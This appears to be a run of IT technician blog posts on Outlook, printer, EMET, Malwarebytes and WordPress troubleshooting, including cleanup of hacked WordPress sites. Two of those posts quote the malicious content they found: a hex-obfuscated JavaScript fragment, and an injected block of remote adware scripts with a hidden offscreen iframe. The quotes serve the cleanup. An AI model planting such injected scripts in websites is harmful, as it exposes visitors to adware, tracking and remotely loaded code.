Outlook “Sorry we are having trouble opening this item. This could be temporary..”

Had a couple of users that were getting this error:

“Sorry, we’re having trouble opening this item. This could be temporary, but if you see it again you might want to restart Outlook”

They use an Exchange server. This was solved by rebuilding the Outlook profile. Here were the steps.

  1. Go into the control panel >> mail >> show profiles.
  2. Add a new profile, and click next. It should find the users credentials from the exchange server
  3. Check “Prompt for a profile to be used.”
  4. Restart Outlook and select the new profile.
  5. Then go back to the control panel >> Mail >> Show Profile and select “Always use this profile. Use the dropdown and select the new profile. Hit apply.
  6. You may need to restart outlook a few times for everything to work properly. At the bottom of Outlook will see outlook adding the emails back into this new profile.
  7. When everything is working you can delete the old profile.

What is SEO poisoning?

I found the following article that introduced me to the term “SEO poisoning.”

http://www.scmagazine.com/attackers-use-seo-spam-to-improve-the-rankings-of-their-websites-on-google-and-other-search-engines/article/375339/

I was considering this Cross-Site Scripting, but the code wasn’t malicious is was just leading back to another site selling their services. The term SEO poisoning makes more sense. The goal of this poisoning is to increase the rankings of the company performing the action by embedding links into a legitimate site and linking back to their site. Link backs are part of the matrix Google uses to rank your site.

The links are often displayed off screen so webmasters are usually unaware of the poisoning even happening. Fortunately some of the writers of the plugins are aware of this technique are incorporating tools into their plugins.

WordPress site blocked by SonicWall – JS.Agent.NKW_2 (Trojan)

Had a customer’s website blocked by our internal firewall.

dr_blum_homepage_blocked_infection_small

They were running WP Antivirus Site Protection plug-in. It listed the following files.

  • /wp-content/plugins/nextgen-gallery/nggallery.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/lib/imagemagick.inc.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.router.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.routing_app.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/interface.routing_app.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/wordpress_routing/adapter.wordpress_routing_app.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/admin/functions.php
    /wp-content/plugins/si-contact-form/includes/class-fscf-process.php

 

This link provided me with some detail. There was a code that looked like “\x73\x63\x5F\x63\x6F”,\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64″,\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68″,\x77\x69\x64\x74\x68″,\x68\x65\x69\x67\x68\x74″,\x63\x68\x61\x72\x73\x65\x74″,\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,\x72\x65\x66\x65\x72\x72\x65\x72″,

Deleting this out is supposed to help.

https://wordpress.org/support/topic/jsagent-warnings-in-avg-nightmare-hack-in-multiple-wordpress-sites

Here is a good article on this issue.

http://blog.sucuri.net/2012/12/website-malware-sharp-increase-in-spam-attacks-wordpress-joomla.html

 

 

WordPress site infected with CouponDropDown Adware

Customers WordPress site got hacked. They use Network Solutions as their host. Network Solutions took their site offline. We had to delete all the WordPress files, upload a clean version, and put their content and theme back. After that the site was back up and running.

I reviewed the site to make sure the permalinks didn’t cause a problem. On one page there were banners ads showing up.

lawyer_website_xxs

The issue turned out to be a form Cross Site Scripting or SEO poisoning. There was a database entry that had the extra text in it. Here is the text below.

————————————————————————————————–

<div id=”__tbSetup”></div>

<script type=”text/javascript” src=”http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862″></script><script type=”text/javascript” src=”https://loading-resource.com/data.js.php?i={6C425871-ABD5-4124-A2B2-C02CE1D37F67}&amp;d=2013-1-17&amp;s=http://mcmanus-darden.com/home/wp-admin/post.php?post=361&amp;action=edit”></script><script id=”__changoScript” type=”text/javascript”>// <![CDATA[

var __chd__ = {‘aid’:11079,’chaid’:’www_objectify_ca’};(function() { var c = document.createElement(‘script’); c.type = ‘text/javascript’; c.async = true;c.src = ( ‘https:’ == document.location.protocol ? ‘https://z’: ‘http://p’) + ‘.chango.com/static/c.js’; var s = document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(c, s);})();

// ]]></script><script id=”__simpliScript” type=”text/javascript” src=”http://i.simpli.fi/dpx.js?cid=3065&amp;m=1″ data-sifi-parsed=”true”></script><script type=”text/javascript” src=”http://www.superfish.com/ws/sf_main.jsp?dlsource=wjfudcm&amp;userId=ezZDNDI1ODcxLUFCRDUtND&amp;CTID=default-US”></script><script type=”text/javascript” src=”http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js”></script><script type=”text/javascript” src=”http://i.simpli.fi/p?cid=3065&amp;cb=dpx_48652254532._hp”></script><iframe id=”l3adg3n-xdm” style=”position: absolute; top: -1000px; left: -1000px; width: 1px; height: 1px;” src=”http://www.vitruvianleads.com/build/xdm.html” width=”320″ height=”240″></iframe>

————————————————————————————————–

There were multiple entries under this title. I used the source to figure out the actual page is was effecting. It was entry 361. There were approximately 20 revisions, but it was the original 361 that took the script off the site. It was in some revisions but not all.

I hope this helps someone else….

 

iPhone not syncing with Outlook – Emails not deleting

The first thing I tried was deleting the existing account and adding the account back with IMAP vs POP. This caused it to work better; however, deleted emails in outlook was still showing up on the iPhone.

Second attempt I turned off Exchanges caching. In outlook the emails deleted earlier that day showed up again, but iPhone and Outlook now matched. The person deleted the emails that came back and Outlook and the iPhone were now syncing.

If this doesn’t fix the problem I will attempt the “marking” as “read” tip I found on this page.

https://discussions.apple.com/thread/5381664?tstart=0

I hope this helps someone else out there…

HP laserjet 4000 – 41.3 Error – Prints one job then displays the error code – Solved

Customer could only print one job at a time before error code came up. I found the following post that mentioned wrong default paper size and paper tray sensors causing this error.

http://h30499.www3.hp.com/t5/Printers-LaserJet/hp-laserjet-4000-41-3-unexpected-paper-size-help/td-p/1118558#.VG-n4snwtfc

We changed the printer paper size to “plain” and seated the trays till error disappeared.

I hope this helps someone else…

Solved Internet Explorer won’t open – EMET 5.0 conflict

We have a customer that must use Internet Explorer for the work software. It is how the login, punch their time clocks, and perform sales. Well Internet Explorer suddenly stopped working.

The first time I uninstalled IE, and this worked for a short time. The real issue turned out to be EMET 5.0 was preventing it from running.

Solution was to uninstall EMET 5.0, download 5.1 and install it. Everything worked after that.

I hope this helps someone else.

Malwarebytes trial expired box pop up in taskbar.

Client started getting a Malwarebytes popup next to their clock in the system tray. Worried about this being Malware itself I didn’t click on it. I uninstalled the version of Malwarebytes that was currently installed and reinstalled the a new downloaded free version.

I also ran CCleaner to clean the registry. It didn’t find anything related to MalwareBytes. I then re-installed MalwareBytes.

What I should have done is in this Forum post. MalwareBytes makes a cleaner for uninstalling their product. If the customer continues to get the pop up I will log back in and uninstall the current version >> run the cleaner >> re-install a new download of MalwareBytes. Below is the link I found.

https://forums.malwarebytes.org/index.php?/topic/113042-malwarebytes-trial-version-expired-message/

I hope this helps someone else.

Manully Moving WordPress Site to Localhost

  1. FTP the files to your localhost directory.
  2. Import the the MySQL dump of the live site.
  3. Change the “wp-config.php” file settings to reflect your new hosting information.
  4. Lastly run the following SQL statements to update links in the database.

UPDATE wp_options SET option_value = replace(option_value, ‘http://www.example.com’, ‘http://localhost/test-site’) WHERE option_name = ‘home’ OR option_name = ‘siteurl’;

UPDATE wp_posts SET post_content = replace(post_content, ‘http://www.example.com’, ‘http://localhost/test-site’);

UPDATE wp_postmeta SET meta_value = replace(meta_value,’http://www.example.com’,’http://localhost/test-site’);

The first update command didn’t work for me. I believe the person who set up the changed the default home page to be something else. I fixed this by going into the database, and under the table wp-options I was able to set this manually. I then logged into the back-end of the site and under Settings >> General. I manually typed in my localhost address in the “Site Address (URL)” field.

I found the following link that helped me out.

http://www.wpbeginner.com/wp-tutorials/how-to-move-live-wordpress-site-to-local-server/

I hope this helps someone else out there….